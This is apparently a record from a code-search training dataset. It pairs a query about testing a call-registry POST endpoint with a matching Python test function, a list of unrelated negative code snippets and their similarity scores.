server_.encode(\"utf-8\",errors=\"replace\")\n if isinstance(port_,unicode):\n port_ = port_.encode(\"utf-8\",errors=\"replace\")\n if isinstance(token_,unicode):\n token_ = token_.encode(\"utf-8\",errors=\"replace\")\n respavailable_ = ctypes.c_int32()\n resp_ = ctypes.c_int32()\n trm_ = ctypes.c_int32()\n res = __library__.MSK_XX_asyncgetresult(self.__nativep,server_,port_,token_,ctypes.byref(respavailable_),ctypes.byref(resp_),ctypes.byref(trm_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n respavailable_ = respavailable_.value\n _respavailable_return_value = respavailable_\n _resp_return_value = rescode(resp_.value)\n _trm_return_value = rescode(trm_.value)\n return (_respavailable_return_value,_resp_return_value,_trm_return_value)", "def is_async(self) -> bool:\n return self.__is_async", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")" ]
[ "0.6209489", "0.5881146", "0.57704556", "0.5739999", "0.57303506", "0.56933546", "0.56448203", "0.560831", "0.5604192", "0.56039965", "0.55831635", "0.5569415", "0.549603", "0.549603", "0.549603", "0.549603", "0.549603", "0.549603", "0.5446532", "0.5408486", "0.53901416", "0.53899354", "0.5343078", "0.5314595", "0.5265895", "0.52458835", "0.52325565", "0.52004564", "0.5195147", "0.5192385", "0.5172518", "0.51630855", "0.51570153", "0.51502806", "0.5145693", "0.5127453", "0.5124669", "0.51163733", "0.51105595", "0.5106413", "0.510547", "0.5102128", "0.50933534", "0.50906736", "0.50887674", "0.5070433", "0.50699556", "0.5057975", "0.5052826", "0.5049234", "0.5038654", "0.50286746", "0.5028312", "0.5021387", "0.5017547", "0.5005221", "0.4995459", "0.4983271", "0.49805698", "0.49705046", "0.49546266", "0.49421138", "0.4938951", "0.4938483", "0.49314237", "0.49306422", "0.4906907", "0.4901921", "0.48889264", "0.48884037", "0.48838067", "0.48755845", "0.48742393", "0.48606563", "0.48510528", "0.48482025", "0.4846087", "0.4844524", "0.4844524", "0.4844524", "0.48389354", "0.4831956", "0.48319", "0.48286414", "0.48234373", "0.48220667", "0.48202893", "0.4812617", "0.48068264", "0.48011586", "0.47994447", "0.47980604", "0.47958475", "0.4795839", "0.4789264", "0.47877395", "0.478711", "0.4770706", "0.47683853", "0.4767934" ]
0.53526616
22
Test POST a start call registry and expect a response from API containing a job_id and the data posted. Test uses start_call_fx fixture
def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') response_data = response.json() assert response.status_code == status.HTTP_201_CREATED assert 'job_id' in response_data for item in start_call_fx.items(): assert item in response_data['data'].items()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_submit_job(self):\n body = '\\\"{train: \\\\\\\"http:/github.com/path/file1\\\\\\\", seed:5, epochs: 5000}\\\"'\n response = self.client.open(\n '/tx-queue/2/scheduler/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def post(self):\n data = api.payload\n\n try:\n phone_call_start = repository.find_start_call_by_call_id(data[\"call_id\"])\n except NoResultFound:\n return 'no call found by specified call id', 404\n\n phone_call_start.end_timestamp = parser.parse(data[\"end_timestamp\"]).replace(tzinfo=None)\n\n # repository.session.add(phone_call_start)\n repository.db.session.commit()\n\n return phone_call_start", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_successful(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertEqual(result['max_tries'], 3)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_creating_a_job(created_job, bulk_request):\n assert created_job.job == 'THEJOBID'\n assert created_job.job_url == 'https://salesforce/services/async/34.0/job/THEJOBID'\n assert created_job.pending_batches == []\n assert created_job.is_open\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job',\n data=XMLMatcher('''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <operation>update</operation>\n <object>Lead</object>\n <contentType>CSV</contentType>\n </jobInfo>\n ''')\n )", "def test_success_on_post(self, mock_create, mock_msg_mgr):\n\n url = '/%s/jobs/' % self.api\n\n User.objects.create_superuser(username='test', email='[email protected]', password='password')\n\n self.client.login(username='test', password='password',)\n response = self.client.post(url, data=self.json_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n # Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])", "async def test_launch_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_LAUNCH_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def start_job(self):\n # POST /jobs/{job_id}/results\n pass", "def test_create_seed_validation(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'validation'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)", "def test_create_valid_submission(self):\n with self.client:\n # valid submission registration\n sub_response = register_ok_submission(self, self.token)\n response_data = json.loads(sub_response.data.decode())\n self.assertTrue(response_data['status']=='success')", "def test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def test_run_prefix__success_with_json(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--metadata-json\",\n '{\"somekey\": \"somevalue\"}',\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Assigning metadata to the uploaded samples.\" in res.output", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "def start_run(group_id):\n # Get the access token first to raise an error immediately if no token is\n # present (to avoid unnecessarily instantiating the service API).\n token = ACCESS_TOKEN(request)\n # Verify that the request contains a valid Json object that contains a\n # optional list of workflow arguments.\n obj = jsonbody(request, optional=[labels.RUN_ARGUMENTS])\n args = obj[labels.RUN_ARGUMENTS] if labels.RUN_ARGUMENTS in obj else dict()\n from robflask.service import service\n with service(access_token=token) as api:\n # Authentication of the user from the expected api_token in the header\n # will fail if no token is given or if the user is not logged in.\n try:\n r = api.runs().start_run(group_id=group_id, arguments=args)\n except UnknownParameterError as ex:\n # Convert unknown parameter errors into invalid request errors\n # to avoid sending a 404 response\n raise err.InvalidRequestError(str(ex))\n return make_response(jsonify(r), 201)", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def test_post_job_log_export(self):\n job_id = 'job_id_example'\n response = self.client.open(\n '/v1/job/logs',\n method='POST',\n data=json.dumps(job_id),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def start(self, **kwargs):\n return self.client.api.start(self.id, **kwargs)", "def test_get_start_form_data(self):\n pass", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_get_job(self):\n response = self.client.open(\n '/v1/job/{id}'.format(id='id_example'),\n method='GET',\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "async def job_start(self, uid, args, env, cwd, port_expected_count,\n forward_stdout=False):\n self._require_running()\n if port_expected_count and self._job_start_endpoint is None:\n raise RuntimeError(\n 'cannot run server job: job start endpoint is not set'\n )\n process_env = dict(os.environ)\n # TODO: Make properties case-insensitve, forced uppercase?\n self._extend_with_prefix(\n process_env,\n self._properties,\n self.PREFIX_PROPERTIES\n )\n if port_expected_count:\n self._extend_with_prefix(\n process_env,\n {\n self.PROPERTY_JOB_ENDPOINT: self._job_start_endpoint,\n self.PROPERTY_JOB_ID: str(uid)\n },\n self.PREFIX_PROPERTIES\n )\n process_env.update(env or {})\n\n await self._get_job(uid).start(\n args, process_env, cwd, port_expected_count, forward_stdout\n )\n # TODO: Support job queueing?\n # (and finite amount of job slots on an agent instance)", "def test_create_monitoring_success(\n self,\n mock_kfp_client,\n ):\n project_id = util.MOCK_UUID_1\n deployment_id = util.MOCK_UUID_1\n task_id = util.MOCK_UUID_1\n\n rv = TEST_CLIENT.post(\n f\"/projects/{project_id}/deployments/{deployment_id}/monitorings\",\n json={\n \"taskId\": task_id,\n },\n )\n result = rv.json()\n expected = {\n \"createdAt\": mock.ANY,\n \"deploymentId\": deployment_id,\n \"taskId\": task_id,\n \"task\": {\"name\": util.MOCK_TASK_NAME_1, \"tags\": []},\n \"uuid\": mock.ANY,\n }\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)\n\n mock_kfp_client.assert_any_call(host=\"http://ml-pipeline.kubeflow:8888\")", "def start(self):\n url = \"/jobs.start\"\n payload = {\n \"id\": self.id\n }\n response = self.engine.request(\"POST\", url, json=payload)\n if response.status_code != 200:\n raise EngineError(\"Failed to upload the job payload. ({} - {})\".format(response.status_code, response.text[:100]))\n\n d = response.json()\n if d['ok'] is False:\n raise EngineError(\"Failed to upload the job payload. ({})\".format(d['error']))\n\n self._update(d['job'])", "def start(self):\n self.server.request(\"post\", \"/jobs/%s/%s/state\" % (self.sessionid,\n self.name), body=\"1\")\n return True", "def test_post_building(self):\n url = '/building/'\n data = {\"address\": \"дом 50 улица Ленина\", \"total_bricks_required\": 300}\n today = date.today()\n date_output = today.strftime(\"%Y-%m-%d\")\n data_output = {\n \"id\": 1,\n \"address\": \"дом 50 улица Ленина\",\n \"date_start\": date_output,\n \"date_completed\": None,\n \"date_last_load\": None,\n \"bricks_at_the_moment\": 0,\n \"total_bricks_required\": 300,\n \"date_updated\": date_output\n }\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data, data_output)", "def test_ready_post(self):\n response = self.client.open(\n '/ready',\n method='POST')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_test(self):\n self.protocol.startTest(self.test)\n self.assertEqual(self.io.getvalue(), compat._b(\n \"test: %s\\n\" % self.test.id()))", "def test_starts_returned_async(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n returned_async = Mock(spec=Async)\n\n work = Async(target=_fake_async_returning_target,\n args=[returned_async])\n\n with _ExecutionContext(work):\n run_job()\n\n returned_async.start.assert_called_once_with()", "def post(self):\n data = request.json\n create_testing_scenario(data)\n return None, 201", "def test_successful_configuration(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk,\n \"configuration\" : self.configuration\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start_job(\n self,\n *,\n id: str,\n error_trace: t.Optional[bool] = None,\n filter_path: t.Optional[\n t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]\n ] = None,\n human: t.Optional[bool] = None,\n pretty: t.Optional[bool] = None,\n ) -> ObjectApiResponse[t.Any]:\n if id in SKIP_IN_PATH:\n raise ValueError(\"Empty value passed for parameter 'id'\")\n __path = f\"/_rollup/job/{_quote(id)}/_start\"\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query[\"error_trace\"] = error_trace\n if filter_path is not None:\n __query[\"filter_path\"] = filter_path\n if human is not None:\n __query[\"human\"] = human\n if pretty is not None:\n __query[\"pretty\"] = pretty\n __headers = {\"accept\": \"application/json\"}\n return self.perform_request( # type: ignore[return-value]\n \"POST\", __path, params=__query, headers=__headers\n )", "def test_start(self):\n\n message = {\"method\": \"start\",\n \"params\": {\"elem\": self.container_to_run}}\n response = yield self._get_response(message)\n\n self.assertIsInstance(response, dict)\n self.assertEqual(response[\"method\"], \"start\")\n self.assertIsInstance(response[\"result\"], list)\n\n container_name = \"/\" + self.container_to_run\n\n containers = {i[0]: i[1] for i in response[\"result\"]}\n self.assertIn(container_name, containers.keys(),\n \"Container not found\")\n\n find_up_status = containers[container_name].lower().find(\"up\")\n\n self.assertEqual(find_up_status, 0, \"Container is not running\")", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "def test_POST_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n data = {\n 'data1':'value1',\n 'data2':'morevalues'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_POST_request(\n POST_ECHO_ENDPOINT,\n data,\n params=params\n )\n\n ## test that response can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['data'] == data\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def test_create_job(self):\n engine = Engine(self.config_file, self.api_token)\n\n engine.create_job()\n\n assert engine.ingest_job_id == 23", "def test_successful(self):\n\n url = '/%s/job-types/running/' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['job_type']['name'], self.job.job_type.name)\n self.assertEqual(result['results'][0]['count'], 1)\n self.assertIsNotNone(result['results'][0]['longest_running'])", "def set_start():\n app.logger.debug(\"Got a JSON set_start post\");\n global dateFormat\n reply = {}\n\n flask.session[\"bStart\"] = request.form[\"bStart\"]\n flask.session[\"bLength\"] = request.form[\"bLength\"]\n bLength = int(request.form[\"bLength\"])\n try:\n start = arrow.get(flask.session[\"bStart\"], \"YYYY/MM/DD HH:mm\")\n except:\n reply[\"message\"] = \"Bad date Time.\"\n return jsonify(result=reply)\n \n brevet = AcpBrevet(bLength, start)\n open_limit = brevet.calc_open(0,bLength)\n close_limit = brevet.calc_close(0,bLength)\n\n reply[\"message\"] = \"Start of event and length set.\"\n reply[\"open\"] = open_limit.format(dateFormat)\n reply[\"close\"] = close_limit.format(dateFormat)\n return jsonify(result=reply)", "def test_xqueue_callback_success(self):\r\n fake_key = 'fake key'\r\n xqueue_header = json.dumps({'lms_key': fake_key})\r\n data = {\r\n 'xqueue_header': xqueue_header,\r\n 'xqueue_body': 'hello world',\r\n }\r\n\r\n # Patch getmodule to return our mock module\r\n with patch('courseware.module_render.find_target_student_module') as get_fake_module:\r\n get_fake_module.return_value = self.mock_module\r\n # call xqueue_callback with our mocked information\r\n request = self.request_factory.post(self.callback_url, data)\r\n render.xqueue_callback(request, self.course_key, self.mock_user.id, self.mock_module.id, self.dispatch)\r\n\r\n # Verify that handle ajax is called with the correct data\r\n request.POST['queuekey'] = fake_key\r\n self.mock_module.handle_ajax.assert_called_once_with(self.dispatch, request.POST)", "def request_training():\n log = logger.new()\n request_content = flask.request.get_json()\n if request_content is None:\n log.error('frontend::train_request::invalid_json')\n flask.abort(415)\n\n training_request = extract_training_request(request_content)\n 